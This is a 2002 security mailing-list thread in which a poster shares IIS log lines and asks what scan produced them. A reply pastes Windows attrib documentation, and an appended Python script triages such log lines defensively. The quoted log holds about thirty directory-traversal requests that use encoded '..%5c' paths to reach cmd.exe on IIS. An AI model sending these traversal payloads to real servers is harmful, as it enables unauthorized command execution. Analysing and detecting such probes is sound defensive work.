Re: Arhas?
From: Patrick Nolan (pnolan01@nycap.rr.com)
Date: 03/01/02
- Previous message: Starbuck Newton: "RE: Arhas?"
- In reply to: K M: "Arhas?"
- Next in thread: K M: "Re: Arhas?"
From: "Patrick Nolan" <pnolan01@nycap.rr.com>
To: "K M" <kmoon01@hotmail.com>, <incidents@securityfocus.org>
Date: Fri, 1 Mar 2002 12:01:24 -0500
HTH,
Pat
Attrib
Displays, sets, or removes the read-only, archive, system, and hidden attributes assigned to files or directories. Used without parameters, attrib displays attributes of all files in the current directory.
Syntax
attrib [{+r|-r}] [{+a|-a}] [{+s|-s}] [{+h|-h}] [[Drive:][Path] FileName] [/s[/d]]
Parameters
+r
Sets the read-only file attribute.
-r
Clears the read-only file attribute.
+a
Sets the archive file attribute.
-a
Clears the archive file attribute.
+s
Sets the system file attribute.
-s
Clears the system file attribute.
+h
Sets the hidden file attribute.
-h
----- Original Message -----
From: "K M" <kmoon01@hotmail.com>
To: <incidents@securityfocus.org>
Sent: Friday, March 01, 2002 10:56 AM
Subject: Arhas?
Hi,
Does anybody recognize the IIS scan below? A Google search on the string
"a-r-h-a-s" turns up a brief report on the incidents.org intrusions list,
but no identification.
TIA,
K
get /scripts/..%5c../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..á../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..à%9v../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..à%qf../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..á%8s../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..á%pc../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..o../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..ð??¯../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..ø???¯../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..ü????¯../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /iisadmpwd/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /cgi-bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /samples/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /_vti_cnf/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /adsamples/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
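A way to triage log lines like the ones quoted above, as an added example that is not part of the original thread: it flags requests for cmd.exe, records whether the path uses `..` traversal and an encoded separator, decodes the `dir/a-r-h-a-s` switch with the `dir /a` attribute letters (a leading `-` excludes that attribute), and counts responses other than 404. The five-field line layout is assumed from the quoted log, and the function names are hypothetical.

```python
import re
from collections import Counter

# First four lines are copied from the post; the last is a constructed benign request.
SAMPLE = """\
get /scripts/..%5c../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /default.htm - 200 http/1.0
"""

# Assumed layout, taken from the quoted log: method path args status protocol
LINE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\d{3})\s+(\S+)$")
ATTRS = {"r": "read-only", "h": "hidden", "a": "archive", "s": "system", "d": "directory"}

def dir_filter(args):
    """Decode a 'dir/a...' switch into (attribute, wanted) pairs; [] if absent."""
    m = re.search(r"dir/a:?((?:-?[rhasd])*)", args.lower())
    if not m:
        return []
    return [(ATTRS[t[-1]], not t.startswith("-")) for t in re.findall(r"-?[rhasd]", m.group(1))]

def classify(line):
    """Return a finding dict for a cmd.exe request, or None for anything else."""
    m = LINE.match(line.strip())
    if not m:
        return None
    _, path, args, status, _ = m.groups()
    p = path.lower()
    if not p.endswith("/cmd.exe"):
        return None
    return {
        "root": p.split("/")[1],                 # directory the request starts from
        "traversal": ".." in p,                  # path climbs out of that directory
        "encoded": "%" in p or not p.isascii(),  # separator hidden by encoding
        "filter": dir_filter(args),              # decoded dir /a attribute filter
        "served": status != "404",               # anything but 404 needs follow-up
    }

def summarize(text):
    findings = [f for f in map(classify, text.splitlines()) if f]
    return {
        "probes": len(findings),
        "roots": Counter(f["root"] for f in findings),
        "served": sum(f["served"] for f in findings),
    }

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

A non-zero `served` count is the result to act on first, since every request in the quoted log returned 404.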